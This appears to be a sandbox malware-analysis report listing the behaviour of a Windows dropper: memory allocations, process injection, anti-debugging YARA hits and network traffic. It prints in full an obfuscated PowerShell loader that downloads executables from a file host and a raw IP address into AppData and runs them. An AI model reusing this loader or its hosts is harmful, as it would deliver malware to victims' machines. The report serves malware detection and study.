NtAllocateVirtualMemory July 31, 2024, 2:51 p.m.	process_identifier: 2084 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02542000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 31, 2024, 2:51 p.m.	process_identifier: 2084 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02555000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 31, 2024, 2:51 p.m.	process_identifier: 2084 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02525000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 31, 2024, 2:51 p.m.	process_identifier: 2084 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0254c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 31, 2024, 2:51 p.m.	process_identifier: 2084 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x027f0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 31, 2024, 2:51 p.m.	process_identifier: 2084 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02526000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 31, 2024, 2:51 p.m.	process_identifier: 2084 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0255c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 31, 2024, 2:51 p.m.	process_identifier: 2084 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02543000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 31, 2024, 2:51 p.m.	process_identifier: 2084 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02544000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 31, 2024, 2:51 p.m.	process_identifier: 2084 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02545000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 31, 2024, 2:51 p.m.	process_identifier: 2084 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02546000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 31, 2024, 2:51 p.m.	process_identifier: 2084 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02547000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 31, 2024, 2:51 p.m.	process_identifier: 2084 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02548000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 31, 2024, 2:51 p.m.	process_identifier: 2084 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02549000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 31, 2024, 2:51 p.m.	process_identifier: 2084 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04970000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 31, 2024, 2:51 p.m.	process_identifier: 2084 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04971000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 31, 2024, 2:51 p.m.	process_identifier: 2084 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04972000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 31, 2024, 2:51 p.m.	process_identifier: 2084 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04973000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 31, 2024, 2:51 p.m.	process_identifier: 2084 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04974000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 31, 2024, 2:51 p.m.	process_identifier: 2084 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04975000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 31, 2024, 2:51 p.m.	process_identifier: 2084 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04976000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 31, 2024, 2:51 p.m.	process_identifier: 2084 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04977000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 31, 2024, 2:51 p.m.	process_identifier: 2084 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04978000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 31, 2024, 2:51 p.m.	process_identifier: 2084 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04979000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 31, 2024, 2:51 p.m.	process_identifier: 2084 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0497a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 31, 2024, 2:51 p.m.	process_identifier: 2084 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0497b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 31, 2024, 2:51 p.m.	process_identifier: 2084 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0497c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 31, 2024, 2:51 p.m.	process_identifier: 2084 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0497d000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 31, 2024, 2:51 p.m.	process_identifier: 2084 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0497e000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 31, 2024, 2:51 p.m.	process_identifier: 2084 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0497f000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 31, 2024, 2:51 p.m.	process_identifier: 2084 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04f20000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 31, 2024, 2:51 p.m.	process_identifier: 2084 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04f21000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 31, 2024, 2:51 p.m.	process_identifier: 2084 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04f22000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 31, 2024, 2:51 p.m.	process_identifier: 2084 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04f23000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 31, 2024, 2:51 p.m.	process_identifier: 2084 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04f24000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1

Creates executable files on the filesystem (1 event)

file	C:\Users\test22\AppData\Roaming\23.exe

Creates a shortcut to an executable file (1 event)

file	C:\Users\test22\AppData\Local\Temp\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk

Creates a suspicious process (2 events)

cmdline

powershell.exe -ExecutionPolicy UnRestricted function EBLtV($aGLtIzJ, $MUUDRGgw){[IO.File]::WriteAllBytes($aGLtIzJ, $MUUDRGgw)};function CYoLw($aGLtIzJ){if($aGLtIzJ.EndsWith((hSqAuyRUp @(21033,21087,21095,21095))) -eq $True){Start-Process (hSqAuyRUp @(21101,21104,21097,21087,21095,21095,21038,21037,21033,21088,21107,21088)) $aGLtIzJ}else{Start-Process $aGLtIzJ}};function QafjZdmi($HftxTOL){$OKwmuBS = New-Object (hSqAuyRUp @(21065,21088,21103,21033,21074,21088,21085,21054,21095,21092,21088,21097,21103));[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::TLS12;$MUUDRGgw = $OKwmuBS.DownloadData($HftxTOL);return $MUUDRGgw};function hSqAuyRUp($Etijla){$tjIUffbkI=20987;$SoFQD=$Null;foreach($CtMXFLN in $Etijla){$SoFQD+=[char]($CtMXFLN-$tjIUffbkI)};return $SoFQD};function WVzMbSyaK(){$OFmSHhJ = $env:APPDATA + '\';$gvFjhd = QafjZdmi (hSqAuyRUp @(21091,21103,21103,21099,21102,21045,21034,21034,21106,21106,21106,21033,21096,21088,21087,21092,21084,21089,21092,21101,21088,21033,21086,21098,21096,21034,21089,21092,21095,21088,21082,21099,21101,21088,21096,21092,21104,21096,21034,21099,21038,21106,21101,21036,21094,21038,21041,21092,21106,21089,21093,21095,21042,21108,21034,21053,21084,21086,21094,21104,21099,21082,21058,21104,21092,21087,21088,21033,21099,21087,21089,21034,21089,21092,21095,21088));$XYuScZy = $OFmSHhJ + 'file';EBLtV $XYuScZy $gvFjhd;CYoLw $XYuScZy;;$FWEoWoo = QafjZdmi (hSqAuyRUp @(21091,21103,21103,21099,21045,21034,21034,21044,21039,21033,21036,21040,21039,21033,21036,21042,21037,21033,21036,21041,21041,21034,21101,21106,21101,21105,21034,21037,21038,21033,21088,21107,21088));$qXEYnMFd = $OFmSHhJ + '23.exe';EBLtV $qXEYnMFd $FWEoWoo;CYoLw $qXEYnMFd;;;}WVzMbSyaK;

cmdline

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted function EBLtV($aGLtIzJ, $MUUDRGgw){[IO.File]::WriteAllBytes($aGLtIzJ, $MUUDRGgw)};function CYoLw($aGLtIzJ){if($aGLtIzJ.EndsWith((hSqAuyRUp @(21033,21087,21095,21095))) -eq $True){Start-Process (hSqAuyRUp @(21101,21104,21097,21087,21095,21095,21038,21037,21033,21088,21107,21088)) $aGLtIzJ}else{Start-Process $aGLtIzJ}};function QafjZdmi($HftxTOL){$OKwmuBS = New-Object (hSqAuyRUp @(21065,21088,21103,21033,21074,21088,21085,21054,21095,21092,21088,21097,21103));[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::TLS12;$MUUDRGgw = $OKwmuBS.DownloadData($HftxTOL);return $MUUDRGgw};function hSqAuyRUp($Etijla){$tjIUffbkI=20987;$SoFQD=$Null;foreach($CtMXFLN in $Etijla){$SoFQD+=[char]($CtMXFLN-$tjIUffbkI)};return $SoFQD};function WVzMbSyaK(){$OFmSHhJ = $env:APPDATA + '\';$gvFjhd = QafjZdmi (hSqAuyRUp @(21091,21103,21103,21099,21102,21045,21034,21034,21106,21106,21106,21033,21096,21088,21087,21092,21084,21089,21092,21101,21088,21033,21086,21098,21096,21034,21089,21092,21095,21088,21082,21099,21101,21088,21096,21092,21104,21096,21034,21099,21038,21106,21101,21036,21094,21038,21041,21092,21106,21089,21093,21095,21042,21108,21034,21053,21084,21086,21094,21104,21099,21082,21058,21104,21092,21087,21088,21033,21099,21087,21089,21034,21089,21092,21095,21088));$XYuScZy = $OFmSHhJ + 'file';EBLtV $XYuScZy $gvFjhd;CYoLw $XYuScZy;;$FWEoWoo = QafjZdmi (hSqAuyRUp @(21091,21103,21103,21099,21045,21034,21034,21044,21039,21033,21036,21040,21039,21033,21036,21042,21037,21033,21036,21041,21041,21034,21101,21106,21101,21105,21034,21037,21038,21033,21088,21107,21088));$qXEYnMFd = $OFmSHhJ + '23.exe';EBLtV $qXEYnMFd $FWEoWoo;CYoLw $qXEYnMFd;;;}WVzMbSyaK;

Drops an executable to the user AppData folder (1 event)

file	C:\Users\test22\AppData\Roaming\23.exe

A process created a hidden window (1 event)

Time & API	Arguments	Status	Return	Repeated
ShellExecuteExW July 31, 2024, 2:51 p.m.	show_type: 0 filepath_r: powershell.exe parameters: -ExecutionPolicy UnRestricted function EBLtV($aGLtIzJ, $MUUDRGgw){[IO.File]::WriteAllBytes($aGLtIzJ, $MUUDRGgw)};function CYoLw($aGLtIzJ){if($aGLtIzJ.EndsWith((hSqAuyRUp @(21033,21087,21095,21095))) -eq $True){Start-Process (hSqAuyRUp @(21101,21104,21097,21087,21095,21095,21038,21037,21033,21088,21107,21088)) $aGLtIzJ}else{Start-Process $aGLtIzJ}};function QafjZdmi($HftxTOL){$OKwmuBS = New-Object (hSqAuyRUp @(21065,21088,21103,21033,21074,21088,21085,21054,21095,21092,21088,21097,21103));[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::TLS12;$MUUDRGgw = $OKwmuBS.DownloadData($HftxTOL);return $MUUDRGgw};function hSqAuyRUp($Etijla){$tjIUffbkI=20987;$SoFQD=$Null;foreach($CtMXFLN in $Etijla){$SoFQD+=[char]($CtMXFLN-$tjIUffbkI)};return $SoFQD};function WVzMbSyaK(){$OFmSHhJ = $env:APPDATA + '\';$gvFjhd = QafjZdmi (hSqAuyRUp @(21091,21103,21103,21099,21102,21045,21034,21034,21106,21106,21106,21033,21096,21088,21087,21092,21084,21089,21092,21101,21088,21033,21086,21098,21096,21034,21089,21092,21095,21088,21082,21099,21101,21088,21096,21092,21104,21096,21034,21099,21038,21106,21101,21036,21094,21038,21041,21092,21106,21089,21093,21095,21042,21108,21034,21053,21084,21086,21094,21104,21099,21082,21058,21104,21092,21087,21088,21033,21099,21087,21089,21034,21089,21092,21095,21088));$XYuScZy = $OFmSHhJ + 'file';EBLtV $XYuScZy $gvFjhd;CYoLw $XYuScZy;;$FWEoWoo = QafjZdmi (hSqAuyRUp @(21091,21103,21103,21099,21045,21034,21034,21044,21039,21033,21036,21040,21039,21033,21036,21042,21037,21033,21036,21041,21041,21034,21101,21106,21101,21105,21034,21037,21038,21033,21088,21107,21088));$qXEYnMFd = $OFmSHhJ + '23.exe';EBLtV $qXEYnMFd $FWEoWoo;CYoLw $qXEYnMFd;;;}WVzMbSyaK; filepath: powershell.exe	1	1	0

Changes read-write memory protection to read-execute (probably to avoid detection when setting all RWX flags at the same time) (1 event)

Time & API	Arguments	Status	Return	Repeated
NtProtectVirtualMemory July 31, 2024, 2:51 p.m.	process_identifier: 2340 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 24576 protection: 32 (PAGE_EXECUTE_READ) base_address: 0x003e0000 process_handle: 0xffffffff	1	0	0

Checks adapter addresses which can be used to detect virtual network interfaces (1 event)

Time & API	Arguments	Status	Return	Repeated
GetAdaptersAddresses July 31, 2024, 2:51 p.m.	flags: 15 family: 0		111	0

URL downloaded by powershell script (16 events)

Data received	[
Data received	Wf©ÐÒÇØvÌdÍêSplu&ñ{A¶àðx$ ñÒ /K½AdKæ3}dÀ¯\Wb8ÚãM@ÈJèö¼ËÀÿ
Data received
Data received	K
Data received	GA¨eöBvïåFGÿQ£2(ê¶:Òî[a ¦ùËw/A ý¬óØ"ÀzÖ&ñ 2p&F¢×¡=À=ÐJJìÙôù>Â-ÅÈY(,/[2c÷[/%äWæÝ{MÆWø3³57O£(Ò©¿ùÙH< Ù@ìþ UÜfDË4*OY k w³l¿úîFðhÜ!ºz³¬>'dT¤e¾zi:¬:¡,(Ëê"HD«Ë]Æ£¦Z#ï¤^«#â?úÙ}s×ô£°¹MjÉ6ÑÒ4î=¡èB8\Ê¹AÖJÍ0FÖî½1v t¿¥mÙç³â{Cú#Ðfª¹ëíT<$zÊup4kÝhý[^óâs ÈÑ®°
Data received
Data received
Data received
Data received
Data received	0
Data received	lîùg¹®.Ño}´H¹cUAÍz^htA¼èlðQ±O¬£öê¬èNa>
Data received	p
Data received	E1ê±]-ÇVeb U¿ìxµ;reAµ"{ø-õ¯ºþ½êV³zÙ(Óñ%ÕX¥E$9ØÁTj,U[$CzúX¾³¥&ÊÂ\¿Ûd¯é5Qs ØÀYà}: éJG\¾ ¢yRnùSÉõ°7èÞéNô\| æ¸¿3^ïù¿§?4·5¤YòTåÎ¬·Çe¹ù¸ÙÀX0NÆ»1_¹«ÓÚ¸5»ïxa&åí÷\|ùëJ2åëëÈkGX±d¤ù©Ï(Æ±÷ÊurlïëSn Ï{µ¢nVÁ:â5mÆÂùçµþÓÀ)¼IlÚÎ°Ç·4¡ïó(TÓí¬þüUaéÏ¢pH{ÿhæISË"ßb/@®ïZa6 ÕÁfaú@U .¢à)æùûüö¸FnÈmÒl¡ ÑdÃVÉbø¢Aö¯jAJ Z1ÈÎSwJ¶ZâÚßÜí}¸>´·Ï§/ÿ+ìø©®Z¨{EÏ)W;.D³{u:®?×³Ë Á¢Mw¤¹~<y ^£)^®ztApñBñ_äeBU½byÈ¶Åºé±EcÍs=Iø¸ÑyQxã"ÇÿÿãõãL-ÔrüIïä.²ËáÑê_áÞN`{D:ÑDãh)v÷_äwéXNß¹}CÇPÚÐU´÷\ÄË%5ÔÓÿPã±(OÉ¼GjNCèv°L¾¦àm¼XÍ5ì}×[ä@MærÉÇ,-QËãÓö¶Íwf} A¿æÞ$ßVVËÇ¦JÓW9¨E¯ªØÁè ÿP° ±S?¯.à,>ÝëâÆß=F·¡9§§4Ü±SdÃ[±÷XºjÉp§Y.UÜøå¥~n ç2Ú(é>£GÑNWÏb§qtªîø,Û¡ÿÌL %µPøæí> 83PxS,ge U(ââWÙ¦ãG¬nOÓÀ ¨¢.Â¶¨qça½ÃþäÞäx,vÏÛ}fù"h0ú§()¦YU4pÖ4éº=è¯5¦.xw·¢}'ÔÎ#,QI`<ñ©Íb¢zMnÎ-ÿ&¥hzìD°D[ÖÍM»Ê+±É"Z¢±JÀÃòÁ ½wìh¤à^bïá3BJÁ§-{-âsaLþÇîÏcÕç¯ eÌå£×)¬¤´1þ]db÷é!¼à»ùe]<öÖ àÒ U @§\|ÐáÐÛ-]/%¯ Ù¿ä#¾K ^ò¥n2ÌþnÂÚ(ü~óý7è,õ÷¤z(É_ÒrnÎô:aõo6\Ö26Ñ
Data received
Data received	F
Data received	6SORRURRRRRRRRRRRRRRRRRRRRRR__vbaVar2Vechttp://poslisoubor.cz/gf.php?33f6c54a9a525e2c37453931c2aadebe/9.txtpC:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe4WinHttp.WinHttpRequest.5.1GETOpenSendStatusResponseBody__vbaFreeObj__vbaLateMemCallLd__vbaVarTstEq__vbaLateMemCall__vbaObjVar__vbaObjSetAddref__vbaVarCat__vbaStrVarMove__vbaI2I4__vbaAryMove__vbaFreeVarList__vbaStrVarVal__vbaLbound__vbaUboundÿÌ11@TíOÜÞíLÌª§7_çyL\|K¾É_qm©¦g:O3fÏ·ª`ÓC>Form1 Form1B#ÿÿÿÿ$Form15xÑÐÇFÿÿÌ1Ý¤F©ä¤N£è2mJ@MèoÃ1[ìG ¸IU3rO3fÏ·ª`ÓLGMDIForm1MDIForm1#ÿÿÿÿ$MDIForm15xÑÐÇFÿP6@Ð6@l§{ÿÿÿÿP@ÿÿÿÿ@6@@6@@6@@6@@È@ÿÿÿÿ@6@ÿÿÿÿ´@L@T@´@(@T@@ÿÿÿÿ@6@@6@@6@@6@@ééééÌÌÌÌÌÌÌÌÌÌÌÌUììh@d¡Pd%ìhSVWeøÇEü@U3ÀMàEèEäEàEÜEØEÔEÐEÌE¼ÿÌ@h@è5ð@ÐMÜÿÖEÜPh\|!@èùÐMÐÿÖ(@PÿÓÐMÜÿÖ=@MÐÿ×MÜQhl%@èÉÐMÐÿÖPÿÓÐMÜÿÖMÐÿ×UÜRh\)@è¥ÐMÐÿÖPÿÓÐMÜÿÖMÐÿ×EÜPhL-@èÐMÐÿÖPÿÓÐMÜÿÖMÐÿ×MÜQh¤@è]ÐMÐÿÖPÿÓÐMÜÿÖMÐÿ×UÜ=@jRÿ×+ÂÑøè!PjEäjPjhÿx@MÜÄQÿ×E¸¿;}¸EÄE¼EäÀt&f8u MèP+ÊP;ÊMr ÿ\@MMë ÿ\@EEÜU¼hD@RWPÿL@ÐMÐÿÖPÿÓÐMÌÿÖPÿô@MäQM UÌEÐRPjÿÐ@ÄM¼ÿ@Mè¸ÁKÇMè@ø¸é?ÿÿÿUäEØRPÿä@MØÉtf9uqA÷Þ;ðr ÿ\@MØÆë ÿ\@MØI5°@ÈQÿÖ@UØRøÿÓEàPÿ°@ME EÔRPÿä@MÔÉt#f9uAQ÷Ø;ÂErÿ\@MÔEë ÿ\@MÔIÈQÿÖUÔðRÿÓE jjVPWè^âÿÿÿ,@hs:@ë/5@MØQÿÖUÔRÿÖEÌMÐPQjÿÐ@ÄM¼ÿ@ÃUäRjÿ8@5@MàÿÖMÜÿÖÃMð_^d [å]Âÿ¼@Uììh@d¡Pd%ìLSVWeôÇEø(@U3ÀMØEäEàEØEÔEÐEÀÿÌ@¹Þÿ@EÜEØPÿ@=ð@»E¨ó;u¨Mä¸UÀEÈEÀEØQRVPÿL@ÐMÔÿ×Pÿ @UÜ¿Èâÿ3ÊQÿ´@ÐMÐÿ×Pÿ(@ÐMäÿ×EÐMÔPQjÿÐ@ÄMÀÿ@ÓÖpmòé\|ÿÿÿUäMàÿÌ@hÕ;@ë,öEüt Màÿ@EÐMÔPQjÿÐ@ÄMÀÿ@Ã5@MäÿÖMØÿÖÃMìEà_^d [å]Âÿ¼@Uììh@d¡Pd%ìlSVWeôÇEø8@u3Û]à]Ü]ØPj]È]¸]¨ÿp@øQjÿ¤@ðS+÷EàÆ¤ÖêRjjPjhÿx@Äîzu3ÿ;}M;Ãtf8uPH÷+ò;ñrÿ\@Þëÿ\@ØEUÈE°RÇEÐPÇEÈÇE¨@ÿ@ÈÇ÷ùE¸ÂRU¨RPÿP@EàÀtf8uPH÷+ò;ñrÿ\@ëÿ\@ðM¸UØQRÿ¨@Pÿ @fÈEBf¶3Êÿ@MàQMØ2ÿ@E¸MÈPQjÿ@¸ÄÇppø3ÛéòþÿÿUàEÜRPÿ@hý=@ë/öEütMÜQjÿ8@MØÿ@U¸EÈRPjÿ@ÄÃMàQjÿ8@ÃMìEÜ_^d [å]Âÿ¼@Uììh@d¡Pd%ì(SVWeøÇEüH@3öº@2@uìuèuØuÔuÐuÌ5Ì@MìÿÖº2@MèÿÖEèPè5@MÔQhHP@EÔÿÖMèÿ@UØÇEàHP@RÇEØ`ÿ0@fÀu!EìPhHP@è8ýÿÿMÔEÔQhLP@ÿÖèEh?@ë Mèÿ@Ã=8@UÐ3öRVÿ×EÌPVÿ×Mìÿ@ÃMð_^d [å]ÃUììh@d¡Pd%ìSVWeøÇEüX@º3@MìÇEìÿÌ@EìhLP@Pè´÷ÿÿh{?@Mìÿ@ÃMð_^d [å]ÃUììh@d¡Pd%ìSVW

Poweshell is sending data to a remote host (6 events)

Data sent	tpf©ÐÈà>ª Ëë\|mÖ£k¸IöFï lD/5 ÀÀÀ À 28/ÿwww.mediafire.com
Data sent	FBA,)z HB]Ü^²Óà@yXâýo½¹÷,m²AÕL>b/UGTûaJê*Ö½trIo÷ÄÁ 3 S&0ÎÑ-°`q-ûÛ/îCÉ; zàS´vBÐí8ç§Ç[È?Ô"¡ÃÇw(
Data sent	\|/_¯8ä«nbn?¹´4÷üíiÅ8_Ú]¤=ÀÚg:Ñ,=Fï¾ðÛ#ý+Ñß¥ahÝ¨}BÑÌò;º3à8W2q'æÅÿÁÒíFÌ1Qô]ÜÑ^"CÐf¶rÕà¯z·¡-à_éß¢l:ÉÐ°VÞI¶jÍMÒË[}Qô
Data sent	}yf©ÐÉÿì;BòÌ4-Þ®9á²Ð0$°ÅÂEîúA/5 ÀÀÀ À 288ÿdownload2268.mediafire.com
Data sent	}yf©ÐÉ{Uù¤bæ·³qlÿ¼ýì4l%áß§/5 ÀÀÀ À 288ÿdownload2268.mediafire.com
Data sent	GET /rwrv/23.exe HTTP/1.1 Host: 94.154.172.166 Connection: Keep-Alive

Checks for the Locally Unique Identifier on the system for a suspicious privilege (1 event)

Time & API	Arguments	Status	Return	Repeated
LookupPrivilegeValueW July 31, 2024, 2:51 p.m.	system_name: privilege_name: SeDebugPrivilege	1	1	0

Yara rule detected in process memory (8 events)

description	(no description)	rule	DebuggerCheck__GlobalFlags
description	(no description)	rule	DebuggerCheck__QueryInfo
description	(no description)	rule	DebuggerHiding__Thread
description	(no description)	rule	DebuggerHiding__Active
description	(no description)	rule	ThreadControl__Context
description	(no description)	rule	SEH__vectored
description	Checks if being debugged	rule	anti_dbg
description	Bypass DEP	rule	disable_dep

Communicates with host for which no DNS query was performed (1 event)

host

94.154.172.166

Allocates execute permission to another process indicative of possible code injection (1 event)

Time & API	Arguments	Status	Return	Repeated
NtAllocateVirtualMemory July 31, 2024, 2:51 p.m.	process_identifier: 2424 region_size: 327680 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00400000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x000001ac		3221225496	0

Drops a binary and executes it (1 event)

file	C:\Users\test22\AppData\Roaming\23.exe

Manipulates memory of a non-child process indicative of process injection (3 events)

Time & API	Arguments	Return	Repeated
Process injection	Process 2340 manipulating memory of non-child process 2424
NtUnmapViewOfSection July 31, 2024, 2:51 p.m.	base_address: 0x00400000 region_size: 970752 process_identifier: 2424 process_handle: 0x000001ac	3221225497	0
NtAllocateVirtualMemory July 31, 2024, 2:51 p.m.	process_identifier: 2424 region_size: 327680 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00400000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x000001ac	3221225496	0

Potential code injection by writing to the memory of another process (2 events)

Time & API	Arguments	Status	Return	Repeated
Process injection	Process 2340 injected into non-child 2424
WriteProcessMemory July 31, 2024, 2:51 p.m.	buffer: @ base_address: 0x7efde008 process_identifier: 2424 process_handle: 0x000001ac	1	1	0

